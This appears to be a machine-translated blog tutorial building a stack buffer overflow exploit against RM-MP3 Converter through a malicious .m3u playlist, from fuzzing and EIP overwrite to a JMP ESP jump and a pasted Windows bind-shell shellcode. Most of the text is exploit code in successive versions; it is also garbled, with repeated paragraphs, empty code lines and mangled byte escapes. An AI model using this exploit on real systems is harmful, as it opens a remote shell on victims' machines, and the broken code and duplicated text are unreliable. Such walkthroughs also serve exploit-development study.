First of all open applications RM-MP3_Converter, then open the application also Ollydbg for monitoring application that will diexploit
then go to backtrack, open the console and create a fuzzer that will be used to exploit application-MP3_converter RM. As for the script:
then go to backtrack, open the console and create a fuzzer that will be used to exploit application-MP3_converter RM. As for the script:
#! / usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = 'http://'
buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
After typing the above script, run fuzeer, note on your fuzzer direcktrori, copy the file. M3u created by the fuzzer was then run on the application fuzzer RM.MP3, then look in OllyDbg, we can see the character "A" pile
Once there is an error like the above, it is time to figure out how to register into the EIP register stack, having known the byte is loaded by 32 bit value, which contains an address which is stored inside the payload to be executed. There are several ways to find out, the byte register keberapa piled by the data transmitted by the fuzzer, among others, with the help exploit metasploit framwork.
As for how:
As for how:
after the above step, the next step is to enter the above data into the application fuzzer that has been made previously. Data pattern which will replace the character "A" on the fuzzer.
#! / usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = 'http://'
buffer + =
# buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
After adding data to the fuzzer patterb_create.rb you, run back to your fuzzer and copy back the file. M3u fuzzer that has been created and run the applications that will exploit.
file = "fuzz.m3u"
f = open (file, 'w')
buffer = 'http://'
buffer + =
# buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
After adding data to the fuzzer patterb_create.rb you, run back to your fuzzer and copy back the file. M3u fuzzer that has been created and run the applications that will exploit.
Different from the previous figure, the current value of the register in memory the application has been filled with a string MP3.Converter pattern that had been incorporated into the application fuzzer.
Having managed to crash the application using the pattern of existing data, the next step is to find how many bytes to the string overwrite the existing registers. To do so, will use tools that both the pattern.offset.rb
Having managed to crash the application using the pattern of existing data, the next step is to find how many bytes to the string overwrite the existing registers. To do so, will use tools that both the pattern.offset.rb
customization to the next is a re-application fuzzer change the existing variable buffer
and adding a variable value didalmnya EIP. For more details see the following script.
#! / usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = "http://"
buffer + = "\ X90" * 17 417
buffer + = "\ XEF \ xBE \ xAD \ xDE"
# buffer + =
# buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
After writing the above script, execute again fuzz.m3u file that was created by the application fuzzer was RM.MP3
and adding a variable value didalmnya EIP. For more details see the following script.
#! / usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = "http://"
buffer + = "\ X90" * 17 417
buffer + = "\ XEF \ xBE \ xAD \ xDE"
# buffer + =
# buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
After writing the above script, execute again fuzz.m3u file that was created by the application fuzzer was RM.MP3
Apparent that there is value in the EIP register has been changed to DEADBEEF, next is to try to write ESP, where ESP is a temporary data storage area in memory. To test our script will do the customization in the existing application fuzzer, for more details see the script below:
#! / usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = "http://"
buffer + = "\ X90" * 17 417
buffer + = "\ XEF \ xBE \ xAD \ xDE"
buffer + = "\ X90" * (17 425-len (buffer))
buffer + = "\ xCC" * (20000 - len (buffer))
# buffer + =
# buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
#! / usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = "http://"
buffer + = "\ X90" * 17 417
buffer + = "\ XEF \ xBE \ xAD \ xDE"
buffer + = "\ X90" * (17 425-len (buffer))
buffer + = "\ xCC" * (20000 - len (buffer))
# buffer + =
# buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
Furthermore JMP ESP search in memory that is application, follow these steps
At Ollidbg application, choose the menu, view menu and then select Executable Modules
At Ollidbg application, choose the menu, view menu and then select Executable Modules
The next search command JMP ESP, remedy do right click on the main window, search for, command a new window will appear and type the JMP ESP.
Before adding a JMP ESP address the fuzzer script, the first thing to do is change the offset into little endian format, from 7C9D30D7 be \ xD7 \ x30 \ x9D \ x7C
#! / usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = "http://"
buffer + = "\ X90" * 17 417
buffer + = "\ xD7 \ x30 \ x9D \ x7C"
buffer + = "\ X90" * (17 425-len (buffer))
buffer + = "\ xCC" * (20000 - len (buffer))
# buffer + =
# buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
Execute re-file fuzzer on RM.MP3
#! / usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = "http://"
buffer + = "\ X90" * 17 417
buffer + = "\ xD7 \ x30 \ x9D \ x7C"
buffer + = "\ X90" * (17 425-len (buffer))
buffer + = "\ xCC" * (20000 - len (buffer))
# buffer + =
# buffer + = "\ X41" * 20 000
f.write (buffer)
f.close ()
Execute re-file fuzzer on RM.MP3
The next step is to create a payload that will be incorporated into the buffer. Later, the buffer will be sent along with the JMP ESP address through the fuzzer.
The tool used is:
The tool used is:
Then open your web browser and enter the address 127.0.0.1:55555
Once open select the type of payload that will be used, in this case I am using Windows Bind Shell payload after payload it will choose the type of payload terliahat configuration you use.
Once open select the type of payload that will be used, in this case I am using Windows Bind Shell payload after payload it will choose the type of payload terliahat configuration you use.
After you configure the payload, click generate
Copy the generated above into the fuzzer that you created earlier:
#! usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = "http://"
buffer + = "\ X90" * 17 417
buffer + = "\ xD7 \ x30 \ x9D \ x7C"
buffer + = "\ X90" * 32
buffer + = ("\ x2b \ xc9 \ xd9 \ xed \ xd9 \ x74 \ x24 \ xf4 \ X58 \ xb1 \ x51 \ xbe \ X66 \ X48 \ xa3 \ x21"
"\ x31 \ x70 \ x15 \ x03 \ x70 \ x15 \ x83 \ xa6 \ x4c \ X41 \ xd4 \ xda \ x27 \ x6e \ x5a \ xca"
"\ X41 \ x8f \ x9a \ xf5 \ xd2 \ xfb \ x09 \ x2d \ x37 \ x77 \ x94 \ x11 \ xbc \ xfb \ x12 \ x11"
"\ xc3 \ xec \ x96 \ xae \ XDB \ x79 \ xf7 \ x10 \ xDD \ x96 \ X41 \ XDB \ xe9 \ xe3 \ x53 \ x35"
"\ x20 \ x34 \ xca \ x65 \ xc7 \ x74 \ x99 \ x72 \ x09 \ xbe \ x6f \ x7d \ x4b \ xd4 \ x84 \ x46"
"\ x1f \ x0f \ x4d \ XCD \ x7a \ xc4 \ xd2 \ x09 \ x84 \ x30 \ x8a \ xda \ x8a \ x8d \ xd8 \ x83"
"\ x8e \ x10 \ x34 \ X38 \ x83 \ x99 \ x43 \ x52 \ xFF \ x81 \ x32 \ x69 \ xce \ x62 \ xd0 \ xe6"
"\ x72 \ xa5 \ x92 \ xb8 \ x78 \ x4e \ xd4 \ x24 \ x2c \ XDB \ x55 \ x5c \ x70 \ xb4 \ XDB \ x12"
"\ x82 \ xa8 \ xb4 \ x55 \ x4c \ x56 \ X66 \ XCF \ x19 \ xa4 \ xba \ x67 \ xad \ xb9 \ x88 \ x28"
"\ X05 \ xc1 \ X3D \ xbe \ x6e \ xd0 \ x42 \ X05 \ x21 \ xd4 \ x6d \ x26 \ X48 \ XCF \ xf4 \ x59"
"\ xa7 \ x18 \ xfb \ x0c \ x52 \ x1b \ x04 \ x7e \ xca \ xc2 \ xf3 \ x8b \ xa6 \ xa2 \ xfc \ xa5"
"\ xea \ x1f \ x50 \ X1A \ x5e \ xe3 \ X05 \ xdf \ x33 \ x1c \ x79 \ xb9 \ XDB \ xf3 \ x26 \ X23"
"\ x4f \ x7d \ x37 \ x3e \ x07 \ xd9 \ xa2 \ x30 \ x1f \ x76 \ x2c \ X66 \ xf5 \ x69 \ x83 \ xd3"
"\ xf5 \ x5a \ x4b \ x7f \ xa4 \ X75 \ x65 \ x28 \ X48 \ x5f \ x26 \ x83 \ x49 \ xb0 \ XA1 \ xce"
"\ xFF \ xb7 \ x7b \ x47 \ xFF \ x6e \ x2b \ x33 \ xab \ XDB \ x33 \ x6b \ xc0 \ x8c \ x2c \ xf2"
"\ x21 \ x35 \ xe4 \ xfb \ x78 \ x93 \ xf5 \ xd3 \ xe3 \ x76 \ x6e \ xb5 \ x83 \ xe5 \ x03 \ xb0"
"\ xb1 \ x80 \ x8b \ x9b \ x10 \ x99 \ xa5 \ xfc \ x09 \ x65 \ x3f \ xe0 \ xFF \ xa5 \ xcc \ x4e"
"\ x01 \ x67 \ x1e \ x70 \ xbc \ x44 \ xf3 \ x01 \ x3b \ xad \ X58 \ xb2 \ x17 \ xa5 \ xec \ x3a"
"\ xd4 \ x20 \ xee \ xb7 \ x5f \ xb2 \ xc6 \ x6c \ x37 \ x1e \ xb6 \ xc3 \ xe6 \ xf4 \ x39 \ xb2"
"\ x59 \ x5c \ x6b \ xcb \ x8a \ x36 \ x26 \ xea \ x2e \ x09 \ x6b \ xf3 \ xe7 \ xFF \ x73 \ xf4"
"\ x3f \ xFF \ x5c \ x81 \ x17 \ x03 \ xdf \ x51 \ xf3 \ x04 \ x36 \ x0b \ x03 \ x2a \ xdf \ xd5"
"\ X23 \ x29 \ x53 \ x7a \ x2b \ x78 \ x6b \ XAC")
f = open (file, 'w')
f.write (buffer)
f.close ()
restart fuzzer that you created earlier
#! usr / bin / python
file = "fuzz.m3u"
f = open (file, 'w')
buffer = "http://"
buffer + = "\ X90" * 17 417
buffer + = "\ xD7 \ x30 \ x9D \ x7C"
buffer + = "\ X90" * 32
buffer + = ("\ x2b \ xc9 \ xd9 \ xed \ xd9 \ x74 \ x24 \ xf4 \ X58 \ xb1 \ x51 \ xbe \ X66 \ X48 \ xa3 \ x21"
"\ x31 \ x70 \ x15 \ x03 \ x70 \ x15 \ x83 \ xa6 \ x4c \ X41 \ xd4 \ xda \ x27 \ x6e \ x5a \ xca"
"\ X41 \ x8f \ x9a \ xf5 \ xd2 \ xfb \ x09 \ x2d \ x37 \ x77 \ x94 \ x11 \ xbc \ xfb \ x12 \ x11"
"\ xc3 \ xec \ x96 \ xae \ XDB \ x79 \ xf7 \ x10 \ xDD \ x96 \ X41 \ XDB \ xe9 \ xe3 \ x53 \ x35"
"\ x20 \ x34 \ xca \ x65 \ xc7 \ x74 \ x99 \ x72 \ x09 \ xbe \ x6f \ x7d \ x4b \ xd4 \ x84 \ x46"
"\ x1f \ x0f \ x4d \ XCD \ x7a \ xc4 \ xd2 \ x09 \ x84 \ x30 \ x8a \ xda \ x8a \ x8d \ xd8 \ x83"
"\ x8e \ x10 \ x34 \ X38 \ x83 \ x99 \ x43 \ x52 \ xFF \ x81 \ x32 \ x69 \ xce \ x62 \ xd0 \ xe6"
"\ x72 \ xa5 \ x92 \ xb8 \ x78 \ x4e \ xd4 \ x24 \ x2c \ XDB \ x55 \ x5c \ x70 \ xb4 \ XDB \ x12"
"\ x82 \ xa8 \ xb4 \ x55 \ x4c \ x56 \ X66 \ XCF \ x19 \ xa4 \ xba \ x67 \ xad \ xb9 \ x88 \ x28"
"\ X05 \ xc1 \ X3D \ xbe \ x6e \ xd0 \ x42 \ X05 \ x21 \ xd4 \ x6d \ x26 \ X48 \ XCF \ xf4 \ x59"
"\ xa7 \ x18 \ xfb \ x0c \ x52 \ x1b \ x04 \ x7e \ xca \ xc2 \ xf3 \ x8b \ xa6 \ xa2 \ xfc \ xa5"
"\ xea \ x1f \ x50 \ X1A \ x5e \ xe3 \ X05 \ xdf \ x33 \ x1c \ x79 \ xb9 \ XDB \ xf3 \ x26 \ X23"
"\ x4f \ x7d \ x37 \ x3e \ x07 \ xd9 \ xa2 \ x30 \ x1f \ x76 \ x2c \ X66 \ xf5 \ x69 \ x83 \ xd3"
"\ xf5 \ x5a \ x4b \ x7f \ xa4 \ X75 \ x65 \ x28 \ X48 \ x5f \ x26 \ x83 \ x49 \ xb0 \ XA1 \ xce"
"\ xFF \ xb7 \ x7b \ x47 \ xFF \ x6e \ x2b \ x33 \ xab \ XDB \ x33 \ x6b \ xc0 \ x8c \ x2c \ xf2"
"\ x21 \ x35 \ xe4 \ xfb \ x78 \ x93 \ xf5 \ xd3 \ xe3 \ x76 \ x6e \ xb5 \ x83 \ xe5 \ x03 \ xb0"
"\ xb1 \ x80 \ x8b \ x9b \ x10 \ x99 \ xa5 \ xfc \ x09 \ x65 \ x3f \ xe0 \ xFF \ xa5 \ xcc \ x4e"
"\ x01 \ x67 \ x1e \ x70 \ xbc \ x44 \ xf3 \ x01 \ x3b \ xad \ X58 \ xb2 \ x17 \ xa5 \ xec \ x3a"
"\ xd4 \ x20 \ xee \ xb7 \ x5f \ xb2 \ xc6 \ x6c \ x37 \ x1e \ xb6 \ xc3 \ xe6 \ xf4 \ x39 \ xb2"
"\ x59 \ x5c \ x6b \ xcb \ x8a \ x36 \ x26 \ xea \ x2e \ x09 \ x6b \ xf3 \ xe7 \ xFF \ x73 \ xf4"
"\ x3f \ xFF \ x5c \ x81 \ x17 \ x03 \ xdf \ x51 \ xf3 \ x04 \ x36 \ x0b \ x03 \ x2a \ xdf \ xd5"
"\ X23 \ x29 \ x53 \ x7a \ x2b \ x78 \ x6b \ XAC")
f = open (file, 'w')
f.write (buffer)
f.close ()
restart fuzzer that you created earlier
this:
Please browse the file system of your own windows .....
Quite tiring .........
No comments:
Post a Comment